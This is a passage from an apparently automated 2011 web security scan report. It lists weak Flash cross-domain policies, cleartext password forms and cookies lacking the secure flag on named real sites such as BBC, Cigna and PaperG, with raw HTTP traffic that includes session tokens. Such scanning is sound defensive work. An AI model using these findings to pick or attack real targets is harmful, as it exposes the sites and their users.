Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=114
Expires: Mon, 16 May 2011 14:52:32 GMT
Date: Mon, 16 May 2011 14:50:38 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...
3.7. http://newsrss.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Mon, 16 May 2011 14:52:37 GMT
Date: Mon, 16 May 2011 14:50:37 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...
3.8. http://www.paperg.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.paperg.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:45:36 GMT
Server: Apache
Last-Modified: Tue, 30 Mar 2010 22:02:28 GMT
ETag: "204-4830bc9102500"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Tue, 17 May 2011 14:45:36 GMT
Content-Type: application/xml
Content-Length: 516
Connection: close
Via: 1.1 AN-0016020122637050

<?xml version="1.0"?>
<!-- http://www.paperg.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.paperg.com"/>
<allow-access-from domain="*.paperg.net"/>
<allow-access-from domain="*.bostonnow.com"/>
<allow-access-from domain="*.thecrimson.com"/>
<allow-access-from domain="*.thephoenix.com"/>
<allow-access-from domain="*.stuffatnight.com"/>
   <allow-access-from domain="*.weeklydig.com"/>
   <allow-access-from domain="*.newhavenindependent.com"/>
...[SNIP]...
3.9. http://www.regions.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.regions.com

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R3380334504; path=/
Content-Length: 1000
Content-Type: text/xml
Last-Modified: Tue, 23 Feb 2010 15:52:47 GMT
Accept-Ranges: bytes
ETag: "3b38bf3ea0b4ca1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:50 GMT
Connection: keep-alive

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.luckie.net" />
<allow-access-from domain="luckie.net" />
<allow-access-from domain="media.pointroll.com"/>
<allow-access-from domain="www.pointroll.com"/>
<allow-access-from domain="submit.pointroll.com"/>
<allow-access-from domain="data.pointroll.com"/>
<allow-access-from domain="speed.pointroll.com"/>
<allow-access-from domain="mirror.pointroll.com"/>
<allow-access-from domain="mx.pointroll.com"/>
<allow-access-from domain="geo.pointroll.com"/>
<allow-access-from domain="ll.pointroll.com"/>
<allow-access-from domain="clk.pointroll.com"/>
<allow-access-from domain="clients.pointroll.com"/>
<allow-access-from domain="fdaf.pointroll.com"/>
<allow-access-from domain="demo.pointroll.net"/>
...[SNIP]...
3.10. https://www.regions.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.regions.com

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R939930197; path=/
Content-Length: 1000
Content-Type: text/xml
Last-Modified: Tue, 23 Feb 2010 15:52:47 GMT
Accept-Ranges: bytes
ETag: "3b38bf3ea0b4ca1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:51 GMT
Connection: keep-alive

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.luckie.net" />
<allow-access-from domain="luckie.net" />
<allow-access-from domain="media.pointroll.com"/>
<allow-access-from domain="www.pointroll.com"/>
<allow-access-from domain="submit.pointroll.com"/>
<allow-access-from domain="data.pointroll.com"/>
<allow-access-from domain="speed.pointroll.com"/>
<allow-access-from domain="mirror.pointroll.com"/>
<allow-access-from domain="mx.pointroll.com"/>
<allow-access-from domain="geo.pointroll.com"/>
<allow-access-from domain="ll.pointroll.com"/>
<allow-access-from domain="clk.pointroll.com"/>
<allow-access-from domain="clients.pointroll.com"/>
<allow-access-from domain="fdaf.pointroll.com"/>
<allow-access-from domain="demo.pointroll.net"/>
...[SNIP]...
3.11. http://xsinternational.app6.hubspot.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xsinternational.app6.hubspot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: xsinternational.app6.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 21:47:20 GMT
Accept-Ranges: bytes
ETag: "0e4f34a711c81:101a8"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 17:08:00 GMT
Connection: close
Set-Cookie: HUBSPOT39=252777644.0.0000; path=/

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p
...[SNIP]...
4. Cleartext submission of password  previous  next
There are 9 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

4.1. http://cigna.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:29:10 GMT
Content-type: text/html
Cache-control: no-cache
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!--Note: formatting/beautifying this code seems to break something. Leave as-is. -->

<html>
<head>

...[SNIP]...
<table class="homeLogIn">
   <form name="frmLogin" id="frmLogin" method="post" action="" onSubmit="return submitLogin();">
   <input type="hidden" name="TARGET" value="">
...[SNIP]...
<td>
           <input type="password" maxLength="32" size="22" name="PASSWORD" style="width:125px; height:15px;" class="portal">
       </td>
...[SNIP]...
4.2. http://www.paperg.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 15:19:13 GMT
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 11476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...
4.3. http://www.paperg.com/company.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /company.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company.php HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/
Cookie: PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmb=1.5.10.1305557438; __utmc=1; __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27786045.1907620487.1305558925.1305558925.1305558925.1; __utmb=27786045; __utmc=27786045; __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 15:19:38 GMT
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 11250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...
4.4. http://www.paperg.com/contact.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /contact.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /contact.php HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 15:19:13 GMT
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 11383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...
4.5. http://www.paperg.com/join.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /join.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /join.php HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/support.php
Cookie: PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305561344.2; __utmc=1; __utmz=1.1305561344.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=27786045.1907620487.1305558925.1305558925.1305561354.2; __utmc=27786045; __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=1.1.10.1305561344; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 16:14:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 12598


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...
4.6. http://www.paperg.com/press.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /press.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /press.php HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/
Cookie: PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305561344.2; __utmc=1; __utmz=1.1305561344.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=27786045.1907620487.1305558925.1305558925.1305561354.2; __utmc=27786045; __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=1.1.10.1305561344; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 16:20:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 13132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...
4.7. http://www.paperg.com/publishers/flyerboard.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /publishers/flyerboard.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /publishers/flyerboard.php HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:45:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 14:45:35 GMT
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 14896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...
4.8. http://www.paperg.com/publishers/placelocal.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /publishers/placelocal.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /publishers/placelocal.php HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/
Cookie: PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305561344.2; __utmc=1; __utmz=1.1305561344.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=27786045.1907620487.1305558925.1305558925.1305561354.2; __utmc=27786045; __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=1.1.10.1305561344; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 16:20:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 13131

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...
4.9. http://www.paperg.com/support.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /support.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /support.php HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 15:19:13 GMT
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 12289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...
5. SSL cookie without secure flag set  previous  next
There are 92 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

5.1. https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/forgotId.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cignaforhcp.cigna.com
Path:   /corp/sso/ci/selfsvc/forgotId.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/ci/selfsvc/forgotId.do?user.portal=provider HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 302 Found
content-language: en-US
content-type: text/html
date: Mon, 16 May 2011 15:31:34 GMT
location: https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/displayId.do
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 0
cache-control: no-cache,no-store,max-age=0
expires: Thu, 01 Jan 1970 00:00:00 GMT
pragma: No-cache
Set-Cookie: JSESSIONID=0000WJAfBu1bY2N8CqEkO0_cQjE:15eoj2vv7; Path=/
Set-Cookie: PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; Path=/
Content-Length: 0

5.2. https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/forgotPassword.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cignaforhcp.cigna.com
Path:   /corp/sso/ci/selfsvc/forgotPassword.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/ci/selfsvc/forgotPassword.do?user.portal=provider HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 302 Found
content-language: en-US
content-type: text/html
date: Mon, 16 May 2011 15:31:39 GMT
location: https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/displayPasswordId.do
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 0
cache-control: no-cache,no-store,max-age=0
expires: Thu, 01 Jan 1970 00:00:00 GMT
pragma: No-cache
Set-Cookie: JSESSIONID=0000-q2wF_IgV38WKNH43KqfhRB:15eoj2var; Path=/
